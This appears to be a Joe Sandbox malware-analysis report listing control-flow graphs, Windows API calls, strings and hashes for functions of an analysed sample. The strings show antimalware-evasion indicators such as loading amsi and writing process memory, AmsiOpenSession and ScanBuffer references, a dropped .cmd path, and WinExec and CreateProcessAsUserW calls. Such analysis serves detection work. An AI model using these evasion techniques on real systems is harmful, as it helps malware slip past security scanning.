                                                                                                                control_flow_graph 10970 2ede678-2ede67c 10971 2ede681-2ede686 10970->10971 10971->10971 10972 2ede688-2edec81 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4740 * 2 call 2ec4860 call 2ec4778 call 2ec30d4 call 2ec46d4 * 2 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4740 call 2ec7f2c call 2ec49a0 call 2ec4d74 call 2ec4df0 call 2ec4740 call 2ec49a0 call 2ec4d74 call 2ec4df0 call 2ed8788 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec47ec call 2ec49a0 call 2ed894c call 2ec4860 call 2ec49a0 call 2ec47ec call 2ec49a0 call 2ed894c call 2ec4860 call 2ec49a0 call 2ec47ec call 2ec49a0 call 2ed894c call 2ec4860 call 2ec49a0 call 2ec47ec call 2ec49a0 call 2ed894c 10971->10972 11175 2edec87-2edeedd call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 WaitForSingleObject CloseHandle * 2 call 2ec4860 call 2ec49a0 call 2ec47ec call 2ec49a0 call 2ed894c call 2ec4860 call 2ec49a0 call 2ec47ec call 2ec49a0 call 2ed894c call 2ec4860 call 2ec49a0 call 2ec47ec call 2ec49a0 call 2ed894c call 2ec4860 call 2ec49a0 call 2ec47ec call 2ec49a0 call 2ed894c * 3 10972->11175 11176 2edeee2-2edef2f call 2ec4500 call 2ec4c60 call 2ec4500 call 2ec4c60 call 2ec4500 10972->11176 11175->11176
                                                                                                                APIs
                                                                                                                  • Part of subcall function 02ED89D0: FreeLibrary.KERNEL32(74F60000,00000000,00000000,00000000,00000000,02F4738C,Function_0000662C,00000004,02F4739C,02F4738C,05F5E103,00000040,02F473A0,74F60000,00000000,00000000), ref: 02ED8AAA
                                                                                                                  • Part of subcall function 02ED8788: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02ED8814
                                                                                                                  • Part of subcall function 02ED894C: LoadLibraryW.KERNEL32(bcrypt,?,00000888,00000000,02F473A8,02EDA587,ScanString,02F473A8,02EDA93C,ScanBuffer,02F473A8,02EDA93C,Initialize,02F473A8,02EDA93C,UacScan), ref: 02ED8960
                                                                                                                  • Part of subcall function 02ED894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02ED897A
                                                                                                                  • Part of subcall function 02ED894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000888,00000000,02F473A8,02EDA587,ScanString,02F473A8,02EDA93C,ScanBuffer,02F473A8,02EDA93C,Initialize), ref: 02ED89B6
                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,ScanString,02F47380,02EDEF4C,OpenSession,02F47380,02EDEF4C,UacScan,02F47380,02EDEF4C,ScanBuffer,02F47380,02EDEF4C,OpenSession,02F47380), ref: 02EDED6E
                                                                                                                • CloseHandle.KERNEL32(00000000,00000000,000000FF,ScanString,02F47380,02EDEF4C,OpenSession,02F47380,02EDEF4C,UacScan,02F47380,02EDEF4C,ScanBuffer,02F47380,02EDEF4C,OpenSession), ref: 02EDED76
                                                                                                                • CloseHandle.KERNEL32(00000864,00000000,00000000,000000FF,ScanString,02F47380,02EDEF4C,OpenSession,02F47380,02EDEF4C,UacScan,02F47380,02EDEF4C,ScanBuffer,02F47380,02EDEF4C), ref: 02EDED7F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Library$CloseFreeHandle$AddressCreateLoadObjectProcProcessSingleUserWait
                                                                                                                • String ID: )"C:\Users\Public\Libraries\lxsyrsiW.cmd" $Amsi$AmsiOpenSession$Initialize$NtOpenProcess$NtSetSecurityObject$OpenSession$ScanBuffer$ScanString$UacScan$ntdll
                                                                                                                • API String ID: 3475578485-1053911981
                                                                                                                • Opcode ID: 5ea7d1b948e73e430725608a67042cc61d12fbc0de2e4824d718af0c2920eeb8
                                                                                                                • Instruction ID: 0808f57ca3db7e028a4ad054fd677513370a7c8887bba9b9908f8809aeaddf27
                                                                                                                • Opcode Fuzzy Hash: 5ea7d1b948e73e430725608a67042cc61d12fbc0de2e4824d718af0c2920eeb8
                                                                                                                • Instruction Fuzzy Hash: 7822F234A801599FEB11FBA4D995BCE73B7AF85300F24E0A9B004AB294DB309E57CF55
                                                                                                                Function 02EC1724 Relevance: 9.0, APIs: 7, Instructions: 289sleepCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 13139 2ec1724-2ec1736 13140 2ec173c-2ec174c 13139->13140 13141 2ec1968-2ec196d 13139->13141 13142 2ec174e-2ec175b 13140->13142 13143 2ec17a4-2ec17ad 13140->13143 13144 2ec1a80-2ec1a83 13141->13144 13145 2ec1973-2ec1984 13141->13145 13148 2ec175d-2ec176a 13142->13148 13149 2ec1774-2ec1780 13142->13149 13143->13142 13152 2ec17af-2ec17bb 13143->13152 13146 2ec1a89-2ec1a8b 13144->13146 13147 2ec1684-2ec16ad VirtualAlloc 13144->13147 13150 2ec1938-2ec1945 13145->13150 13151 2ec1986-2ec19a2 13145->13151 13156 2ec16df-2ec16e5 13147->13156 13157 2ec16af-2ec16dc call 2ec1644 13147->13157 13153 2ec176c-2ec1770 13148->13153 13154 2ec1794-2ec17a1 13148->13154 13158 2ec17f0-2ec17f9 13149->13158 13159 2ec1782-2ec1790 13149->13159 13150->13151 13155 2ec1947-2ec195b Sleep 13150->13155 13160 2ec19a4-2ec19ac 13151->13160 13161 2ec19b0-2ec19bf 13151->13161 13152->13142 13162 2ec17bd-2ec17c9 13152->13162 13155->13151 13168 2ec195d-2ec1964 Sleep 13155->13168 13157->13156 13166 2ec182c-2ec1836 13158->13166 13167 2ec17fb-2ec1808 13158->13167 13170 2ec1a0c-2ec1a22 13160->13170 13163 2ec19d8-2ec19e0 13161->13163 13164 2ec19c1-2ec19d5 13161->13164 13162->13142 13165 2ec17cb-2ec17de Sleep 13162->13165 13172 2ec19fc-2ec19fe call 2ec15cc 13163->13172 13173 2ec19e2-2ec19fa 13163->13173 13164->13170 13165->13142 13171 2ec17e4-2ec17eb Sleep 13165->13171 13175 2ec18a8-2ec18b4 13166->13175 13176 2ec1838-2ec1863 13166->13176 13167->13166 13174 2ec180a-2ec181e Sleep 13167->13174 13168->13150 13177 2ec1a3b-2ec1a47 13170->13177 13178 2ec1a24-2ec1a32 13170->13178 13171->13143 13180 2ec1a03-2ec1a0b 13172->13180 13173->13180 13174->13166 13182 2ec1820-2ec1827 Sleep 13174->13182 13188 2ec18dc-2ec18eb call 2ec15cc 13175->13188 13189 2ec18b6-2ec18c8 13175->13189 13183 2ec187c-2ec188a 13176->13183 13184 2ec1865-2ec1873 13176->13184 13186 2ec1a68 13177->13186 13187 2ec1a49-2ec1a5c 13177->13187 13178->13177 13185 2ec1a34 13178->13185 13182->13167 13194 2ec188c-2ec18a6 call 2ec1500 13183->13194 13195 2ec18f8 13183->13195 13184->13183 13193 2ec1875 13184->13193 13185->13177 13196 2ec1a6d-2ec1a7f 13186->13196 13187->13196 13197 2ec1a5e-2ec1a63 call 2ec1500 13187->13197 13198 2ec18fd-2ec1936 13188->13198 13202 2ec18ed-2ec18f7 13188->13202 13190 2ec18cc-2ec18da 13189->13190 13191 2ec18ca 13189->13191 13190->13198 13191->13190 13193->13183 13194->13198 13195->13198 13197->13196
                                                                                                                APIs
                                                                                                                • Sleep.KERNEL32(00000000,?,02EC1FC1), ref: 02EC17D0
                                                                                                                • Sleep.KERNEL32(0000000A,00000000,?,02EC1FC1), ref: 02EC17E6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Sleep
                                                                                                                • String ID:
                                                                                                                • API String ID: 3472027048-0
                                                                                                                • Opcode ID: 72f845ee6885ba6686e1b64296ff33e682340f76da776bbd631376c183fd1830
                                                                                                                • Instruction ID: df984f6583e635668cd7fbb5440f72d7f06dcc5e215125cf8faa9d8f9fe16e79
                                                                                                                • Opcode Fuzzy Hash: 72f845ee6885ba6686e1b64296ff33e682340f76da776bbd631376c183fd1830
                                                                                                                • Instruction Fuzzy Hash: 98B1337AA846448BCB15CFA8D680755FBE1FB86354F29C66DE40D8F386C7B09463CB90
                                                                                                                Function 02ED88B8 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 35libraryCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • LoadLibraryW.KERNEL32(amsi), ref: 02ED88C1
                                                                                                                  • Part of subcall function 02ED8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02ED82FC,?,?,00000000,00000000,?,02ED8215,00000000,KernelBASE,00000000,00000000,02ED823C), ref: 02ED82C1
                                                                                                                  • Part of subcall function 02ED8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02ED82C7
                                                                                                                  • Part of subcall function 02ED8274: GetProcAddress.KERNEL32(?,?), ref: 02ED82D9
                                                                                                                  • Part of subcall function 02ED7D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02ED7DEC
                                                                                                                • FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 02ED8920
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressLibraryProc$FreeHandleLoadMemoryModuleVirtualWrite
                                                                                                                • String ID: DllGetClassObject$W$amsi
                                                                                                                • API String ID: 941070894-2671292670
                                                                                                                • Opcode ID: b5ba6880b89dce1bb84d7b64bd527b59954dcc853ffe9686957180cd0398a8a8
                                                                                                                • Instruction ID: 759bf6d26a8569122d11b24379fb43aac80323a313511d4873eccdcc46d5eb78
                                                                                                                • Opcode Fuzzy Hash: b5ba6880b89dce1bb84d7b64bd527b59954dcc853ffe9686957180cd0398a8a8
                                                                                                                • Instruction Fuzzy Hash: 50F0445058C381B9D301E3B48C45F4BBECD4BA2264F44DA5DB1E85A2D2D675D1078767
                                                                                                                Function 02EC1A8C Relevance: 7.7, APIs: 6, Instructions: 175sleepCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 13227 2ec1a8c-2ec1a9b 13228 2ec1b6c-2ec1b6f 13227->13228 13229 2ec1aa1-2ec1aa5 13227->13229 13230 2ec1c5c-2ec1c60 13228->13230 13231 2ec1b75-2ec1b7f 13228->13231 13232 2ec1b08-2ec1b11 13229->13232 13233 2ec1aa7-2ec1aae 13229->13233 13238 2ec16e8-2ec170b call 2ec1644 VirtualFree 13230->13238 13239 2ec1c66-2ec1c6b 13230->13239 13234 2ec1b3c-2ec1b49 13231->13234 13235 2ec1b81-2ec1b8d 13231->13235 13232->13233 13240 2ec1b13-2ec1b27 Sleep 13232->13240 13236 2ec1adc-2ec1ade 13233->13236 13237 2ec1ab0-2ec1abb 13233->13237 13234->13235 13241 2ec1b4b-2ec1b5f Sleep 13234->13241 13242 2ec1b8f-2ec1b92 13235->13242 13243 2ec1bc4-2ec1bd2 13235->13243 13246 2ec1ae0-2ec1af1 13236->13246 13247 2ec1af3 13236->13247 13244 2ec1abd-2ec1ac2 13237->13244 13245 2ec1ac4-2ec1ad9 13237->13245 13255 2ec170d-2ec1714 13238->13255 13256 2ec1716 13238->13256 13240->13233 13249 2ec1b2d-2ec1b38 Sleep 13240->13249 13241->13235 13251 2ec1b61-2ec1b68 Sleep 13241->13251 13252 2ec1b96-2ec1b9a 13242->13252 13243->13252 13254 2ec1bd4-2ec1bd9 call 2ec14c0 13243->13254 13246->13247 13253 2ec1af6-2ec1b03 13246->13253 13247->13253 13249->13232 13251->13234 13257 2ec1bdc-2ec1be9 13252->13257 13258 2ec1b9c-2ec1ba2 13252->13258 13253->13231 13254->13252 13261 2ec1719-2ec1723 13255->13261 13256->13261 13257->13258 13260 2ec1beb-2ec1bf2 call 2ec14c0 13257->13260 13262 2ec1bf4-2ec1bfe 13258->13262 13263 2ec1ba4-2ec1bc2 call 2ec1500 13258->13263 13260->13258 13266 2ec1c2c-2ec1c59 call 2ec1560 13262->13266 13267 2ec1c00-2ec1c28 VirtualFree 13262->13267
                                                                                                                APIs
                                                                                                                • Sleep.KERNEL32(00000000,?,?,00000000,02EC1FE4), ref: 02EC1B17
                                                                                                                • Sleep.KERNEL32(0000000A,00000000,?,?,00000000,02EC1FE4), ref: 02EC1B31
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Sleep
                                                                                                                • String ID:
                                                                                                                • API String ID: 3472027048-0
                                                                                                                • Opcode ID: 0d8fdefe66f1622d3e261237b4690b746705db85cd72a2237586a7114325b8ad
                                                                                                                • Instruction ID: e8049de8ae92ae197f9d2cf4edb37e231ac310ba7d6c8234018d4142f4472486
                                                                                                                • Opcode Fuzzy Hash: 0d8fdefe66f1622d3e261237b4690b746705db85cd72a2237586a7114325b8ad
                                                                                                                • Instruction Fuzzy Hash: 5651BF756802408FDB15CFA88A94756BBE0AB46318F28D5AEE44C8F287D7B4D447CB91
                                                                                                                Function 02EDE4B6 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 112networkCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02EDE5F6
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CheckConnectionInternet
                                                                                                                • String ID: Initialize$OpenSession$ScanBuffer
                                                                                                                • API String ID: 3847983778-3852638603
                                                                                                                • Opcode ID: 906aa40268b23a1bb030eb51880d5f5c2093b2fa104f1d16995c78915effc4c1
                                                                                                                • Instruction ID: 390886a7ab1b34ab53811d0cd6059730358c0ce6f1432785043f55d94bba2e47
                                                                                                                • Opcode Fuzzy Hash: 906aa40268b23a1bb030eb51880d5f5c2093b2fa104f1d16995c78915effc4c1
                                                                                                                • Instruction Fuzzy Hash: 59410135B801099BEB01FBE4D951ADE73FAEF88700F64E429F051AB285DA70AD138F55
                                                                                                                Function 02ED8788 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62processCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 02ED81CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02ED823C,?,?,00000000,?,02ED7A7E,ntdll,00000000,00000000,02ED7AC3,?,?,00000000), ref: 02ED820A
                                                                                                                  • Part of subcall function 02ED81CC: GetModuleHandleA.KERNELBASE(?), ref: 02ED821E
                                                                                                                  • Part of subcall function 02ED8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02ED82FC,?,?,00000000,00000000,?,02ED8215,00000000,KernelBASE,00000000,00000000,02ED823C), ref: 02ED82C1
                                                                                                                  • Part of subcall function 02ED8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02ED82C7
                                                                                                                  • Part of subcall function 02ED8274: GetProcAddress.KERNEL32(?,?), ref: 02ED82D9
                                                                                                                • CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02ED8814
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: HandleModule$AddressProc$CreateProcessUser
                                                                                                                • String ID: CreateProcessAsUserW$Kernel32
                                                                                                                • API String ID: 3130163322-2353454454
                                                                                                                • Opcode ID: 554f346403f0bc62e210fca64eee83c20e5c3c7efce1334ddc6d212f4d0e4137
                                                                                                                • Instruction ID: b4cbf7a682873980f5682bfabbe91330cc98788cdfcfb97d874856f2c4502306
                                                                                                                • Opcode Fuzzy Hash: 554f346403f0bc62e210fca64eee83c20e5c3c7efce1334ddc6d212f4d0e4137
                                                                                                                • Instruction Fuzzy Hash: 6511E5B6680248BFEB40EFA9DD51F9AB7EDEB4CB44F519414BA08D3240C674ED128B24
                                                                                                                Function 02ED85BA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46processCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 02ED81CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02ED823C,?,?,00000000,?,02ED7A7E,ntdll,00000000,00000000,02ED7AC3,?,?,00000000), ref: 02ED820A
                                                                                                                  • Part of subcall function 02ED81CC: GetModuleHandleA.KERNELBASE(?), ref: 02ED821E
                                                                                                                  • Part of subcall function 02ED8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02ED82FC,?,?,00000000,00000000,?,02ED8215,00000000,KernelBASE,00000000,00000000,02ED823C), ref: 02ED82C1
                                                                                                                  • Part of subcall function 02ED8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02ED82C7
                                                                                                                  • Part of subcall function 02ED8274: GetProcAddress.KERNEL32(?,?), ref: 02ED82D9
                                                                                                                • WinExec.KERNEL32(?,?), ref: 02ED8624
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: HandleModule$AddressProc$Exec
                                                                                                                • String ID: Kernel32$WinExec
                                                                                                                • API String ID: 2292790416-3609268280
                                                                                                                • Opcode ID: 8fcca304996f19ee3a68b6a545db39604470f1ef72aa93d6df1449059702b3b1
                                                                                                                • Instruction ID: dcaf720c8cad3080a450a9bf52258ea93a9fa5f906be8be8fd1df62fb09fb68b
                                                                                                                • Opcode Fuzzy Hash: 8fcca304996f19ee3a68b6a545db39604470f1ef72aa93d6df1449059702b3b1
                                                                                                                • Instruction Fuzzy Hash: EA016D796C4208BFE700EBE4DC12F6AB7EDE748B10F60E460B900D2640D670AD128A24
                                                                                                                Function 02ED85BC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45processCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 02ED81CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02ED823C,?,?,00000000,?,02ED7A7E,ntdll,00000000,00000000,02ED7AC3,?,?,00000000), ref: 02ED820A
                                                                                                                  • Part of subcall function 02ED81CC: GetModuleHandleA.KERNELBASE(?), ref: 02ED821E
                                                                                                                  • Part of subcall function 02ED8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02ED82FC,?,?,00000000,00000000,?,02ED8215,00000000,KernelBASE,00000000,00000000,02ED823C), ref: 02ED82C1
                                                                                                                  • Part of subcall function 02ED8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02ED82C7
                                                                                                                  • Part of subcall function 02ED8274: GetProcAddress.KERNEL32(?,?), ref: 02ED82D9
                                                                                                                • WinExec.KERNEL32(?,?), ref: 02ED8624
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: HandleModule$AddressProc$Exec
                                                                                                                • String ID: Kernel32$WinExec
                                                                                                                • API String ID: 2292790416-3609268280
                                                                                                                • Opcode ID: 694569c941b3f5f36d5bee27eac3a7f786170a81199bba7406516288e1140d88
                                                                                                                • Instruction ID: 1df5f327f922a402a8d97e96055f0837b79d29ebc1cc4d495afef968468f3f62
                                                                                                                • Opcode Fuzzy Hash: 694569c941b3f5f36d5bee27eac3a7f786170a81199bba7406516288e1140d88
                                                                                                                • Instruction Fuzzy Hash: 7BF06D796C4208BFE700EBE4DC12F6AB7EDE748B10F60E460B900D2640D670AD128A24
                                                                                                                Function 02ED5C2C Relevance: 4.6, APIs: 3, Instructions: 105fileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02ED5D74,?,?,02ED3900,00000001), ref: 02ED5C88
                                                                                                                • GetLastError.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02ED5D74,?,?,02ED3900,00000001), ref: 02ED5CB6
                                                                                                                  • Part of subcall function 02EC7D5C: CreateFileA.KERNEL32(00000000,00000000,00000000,00000000,00000003,00000080,00000000,?,?,02ED3900,02ED5CF6,00000000,02ED5D74,?,?,02ED3900), ref: 02EC7DAA
                                                                                                                  • Part of subcall function 02EC7F98: GetFullPathNameA.KERNEL32(00000000,00000104,?,?,?,02ED3900,02ED5D11,00000000,02ED5D74,?,?,02ED3900,00000001), ref: 02EC7FB7
                                                                                                                • GetLastError.KERNEL32(00000000,02ED5D74,?,?,02ED3900,00000001), ref: 02ED5D1B
                                                                                                                  • Part of subcall function 02ECA778: FormatMessageA.KERNEL32(00003200,00000000,?,00000000,?,00000100,00000000,?,02ECC3D9,00000000,02ECC433), ref: 02ECA797
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateErrorFileLast$FormatFullMessageNamePath
